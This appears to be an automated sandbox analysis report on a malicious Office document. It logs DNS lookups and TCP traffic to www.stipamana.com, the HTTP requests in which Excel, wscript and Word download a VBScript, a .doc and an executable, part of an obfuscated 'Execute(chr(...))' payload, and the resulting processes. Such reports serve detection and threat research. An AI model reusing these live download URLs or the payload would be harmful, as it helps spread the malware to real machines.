                                              Dec 14, 2024 13:51:57.944088936 CET  49162        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:57.968702078 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.968805075 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.968910933 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.969238997 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.969238997 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.969281912 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.969305992 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.969324112 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.969329119 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:52:59.775387049 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:52:59.775435925 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:52:59.775495052 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:52:59.780349970 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:52:59.780368090 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.143707991 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.143785954 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.149328947 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.149334908 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.149672031 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.151335001 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.208811998 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.255348921 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.847285986 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.847348928 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.847388983 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.847402096 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.847425938 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.847439051 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.847445011 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.847454071 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.847465038 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.847479105 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.851645947 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.900177956 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.900243998 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.900381088 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.900403023 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.900487900 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.900511026 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.046454906 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.046510935 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.046526909 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.046541929 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.046554089 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.046575069 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.046736002 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.075464964 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.075525045 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.075541973 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.075551033 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.075561047 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.075586081 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.075715065 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.108975887 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.109038115 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.109067917 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.109075069 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.109091997 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.109108925 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.109173059 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.231230021 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.231287003 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.231308937 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.231339931 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.231357098 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.231374025 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.231426954 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.255497932 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.255558014 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.255563974 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.255572081 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.255609989 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.255644083 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.279613018 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.279659033 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.279685020 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.279694080 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.279705048 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.279726028 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.279783964 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.295059919 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.295105934 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.295128107 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.295135975 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.295146942 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.295164108 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.295212984 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.309808016 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.309859991 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.309883118 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.309890985 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.309902906 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.309920073 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.309981108 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.324429989 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.324481010 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.324556112 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.324562073 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.324589014 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.324595928 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.324608088 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.432539940 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.432595015 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.432818890 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.432818890 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.432832003 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.432878971 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.433649063 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.447601080 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.447653055 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.447917938 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.447932959 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.448008060 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.448549986 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.457731009 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.457773924 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.457962990 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.457972050 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.458009958 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.458009958 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.458590984 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.469679117 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.469727993 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.469796896 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.469796896 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.469805956 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.469826937 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.469902039 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.480775118 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.480829954 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.480901003 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.480901003 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.480911970 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.480992079 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.481420040 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.492082119 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.492127895 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.492249966 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.492249966 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.492249966 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.492258072 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.492319107 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.503932953 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.503984928 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.504044056 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.504044056 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.504050970 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.504086018 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.504086018 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.514111996 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.514168978 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.514234066 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.514240026 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.514375925 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.514375925 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.514375925 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.621838093 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.621896029 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.622162104 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.622178078 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.622220993 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.622220993 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.631345987 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.631397963 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.631447077 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.631447077 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.631464958 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.631634951 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.640989065 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.641035080 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.641096115 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.641096115 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.641115904 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.641155005 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.641155005 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.650296926 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.650346041 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.650414944 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.650414944 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.650428057 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.650734901 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.650859118 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.658932924 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.658984900 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.659044027 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.659064054 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.659101963 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.659101963 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.659336090 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.660108089 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.660200119 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.660270929 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.660270929 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.660284042 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.660335064 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.660335064 CET49163443192.168.2.2287.121.86.205
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 14, 2024 13:51:51.646564960 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Dec 14, 2024 13:51:52.027609110 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Dec 14, 2024 13:51:54.914802074 CET | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Dec 14, 2024 13:51:55.288136959 CET | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Dec 14, 2024 13:51:55.460273981 CET | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Dec 14, 2024 13:51:55.833941936 CET | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Dec 14, 2024 13:52:59.400036097 CET | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Dec 14, 2024 13:52:59.770945072 CET | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 14, 2024 13:51:51.646564960 CET | 192.168.2.22 | 8.8.8.8 | 0xcaec | Standard query (0) | www.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:51:54.914802074 CET | 192.168.2.22 | 8.8.8.8 | 0xbef0 | Standard query (0) | www.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:51:55.460273981 CET | 192.168.2.22 | 8.8.8.8 | 0x1e9 | Standard query (0) | www.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:52:59.400036097 CET | 192.168.2.22 | 8.8.8.8 | 0xd132 | Standard query (0) | www.stipamana.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 14, 2024 13:51:52.027609110 CET | 8.8.8.8 | 192.168.2.22 | 0xcaec | No error (0) | www.stipamana.com | | 87.121.86.205 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:51:55.288136959 CET | 8.8.8.8 | 192.168.2.22 | 0xbef0 | No error (0) | www.stipamana.com | | 87.121.86.205 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:51:55.833941936 CET | 8.8.8.8 | 192.168.2.22 | 0x1e9 | No error (0) | www.stipamana.com | | 87.121.86.205 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:52:59.770945072 CET | 8.8.8.8 | 192.168.2.22 | 0xd132 | No error (0) | www.stipamana.com | | 87.121.86.205 | A (IP address) | IN (0x0001) | false
• www.stipamana.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49161 | 87.121.86.205 | 443 | 3168 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:51:53 UTC | 414 | OUT | GET /exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/vbsfjzbdkjsbgfzskldfbgs/cfhxdfhgjsxgfhxz.vbs HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: www.stipamana.com
  Connection: Keep-Alive
2024-12-14 12:51:54 UTC | 209 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Sat, 14 Dec 2024 12:51:54 GMT
  Content-Length: 10232
  Connection: close
  Last-Modified: Sat, 14 Dec 2024 08:57:05 GMT
  ETag: "27f8-6293721aa1a40"
  Accept-Ranges: bytes
2024-12-14 12:51:54 UTC | 10232 | IN | Data Raw: 45 78 65 63 75 74 65 28 63 68 72 28 36 32 32 35 2f 37 35 29 26 20 63 68 72 28 31 35 34 2d 35 33 29 26 20 63 68 72 28 31 30 34 34 30 2f 39 30 29 26 20 63 68 72 28 31 32 37 2d 39 35 29 26 20 63 68 72 28 37 33 2b 33 38 29 26 20 63 68 72 28 31 36 39 2d 37 31 29 26 20 63 68 72 28 31 33 2b 39 33 29 26 20 63 68 72 28 32 35 2b 36 32 29 26 20 63 68 72 28 31 32 36 30 2f 31 32 29 26 20 63 68 72 28 33 36 2b 37 34 29 26 20 63 68 72 28 31 34 35 2d 37 33 29 26 20 63 68 72 28 36 36 2b 35 30 29 26 20 63 68 72 28 36 31 2b 35 35 29 26 20 63 68 72 28 32 30 36 2d 39 34 29 26 20 63 68 72 28 35 39 2d 32 37 29 26 20 63 68 72 28 31 30 30 2d 33 39 29 26 20 63 68 72 28 39 39 2d 36 37 29 26 20 63 68 72 28 38 35 2d 31 38 29 26 20 63 68 72 28 31 30 30 2b 31 34 29 26 20 63 68 72 28 38
  Data Ascii: Execute(chr(6225/75)& chr(154-53)& chr(10440/90)& chr(127-95)& chr(73+38)& chr(169-71)& chr(13+93)& chr(25+62)& chr(1260/12)& chr(36+74)& chr(145-73)& chr(66+50)& chr(61+55)& chr(206-94)& chr(59-27)& chr(100-39)& chr(99-67)& chr(85-18)& chr(100+14)& chr(8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49162 | 87.121.86.205 | 443 | 3404 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:51:57 UTC | 277 | OUT | GET /exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg/Sfbuild.doc HTTP/1.1
  Connection: Keep-Alive
  Content-Type: text/plain; Charset=UTF-8
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  Host: www.stipamana.com
2024-12-14 12:51:57 UTC | 312 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Sat, 14 Dec 2024 12:51:57 GMT
  Content-Type: application/msword
  Content-Length: 37888
  Last-Modified: Sat, 14 Dec 2024 08:47:41 GMT
  Connection: close
  ETag: "675d462d-9400"
  Expires: Thu, 31 Dec 2037 23:55:55 GMT
  Cache-Control: max-age=315360000
  Accept-Ranges: bytes
2024-12-14 12:51:57 UTC | 16072 | IN | Data Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 03 00 fe ff 09 00 06 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 27 00 00 00 00 00 00 00 00 10 00 00 29 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 26 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
  Data Ascii: >')&
2024-12-14 12:51:57 UTC | 16384 | IN | Data Raw: 00 00 0e 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 01 00 00 00 01 00 00 00 00 0c 10 00 00 02 00 00 00 1e 00 00 00 06 00 00 00 54 69 74 6c 65 00 03 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  Data Ascii: Title
2024-12-14 12:51:57 UTC | 5432 | IN | Data Raw: ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff
  Data Ascii: "r


                                               Session ID    Source IP       Source Port    Destination IP    Destination Port    PID     Process
                                               2             192.168.2.22    49163          87.121.86.205     443                 3460    C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                               Timestamp                  Bytes transferred    Direction    Data
                                               2024-12-14 12:53:01 UTC    417                  OUT          GET /exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/afdtdzrhszdhthsrthsthstgs/server1_protected.exe HTTP/1.1
                                              Accept: */*
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: www.stipamana.com
                                              Connection: Keep-Alive
                                               2024-12-14 12:53:01 UTC    320    IN    HTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Sat, 14 Dec 2024 12:53:01 GMT
                                              Content-Type: application/octet-stream
                                              Content-Length: 395776
                                              Last-Modified: Sat, 14 Dec 2024 07:15:43 GMT
                                              Connection: close
                                              ETag: "675d309f-60a00"
                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                              Cache-Control: max-age=315360000
                                              Accept-Ranges: bytes


                                              Target ID:0
                                              Start time:07:51:47
                                              Start date:14/12/2024
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                              Imagebase:0x13f150000
                                              File size:28'253'536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:4
                                              Start time:07:51:54
                                              Start date:14/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs"
                                              Imagebase:0xff850000
                                              File size:168'960 bytes
                                              MD5 hash:045451FA238A75305CC26AC982472367
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:07:51:57
                                              Start date:14/12/2024
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                              Imagebase:0x13ff90000
                                              File size:1'423'704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:8
                                              Start time:07:53:02
                                              Start date:14/12/2024
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe"
                                              Imagebase:0x150000
                                              File size:395'776 bytes
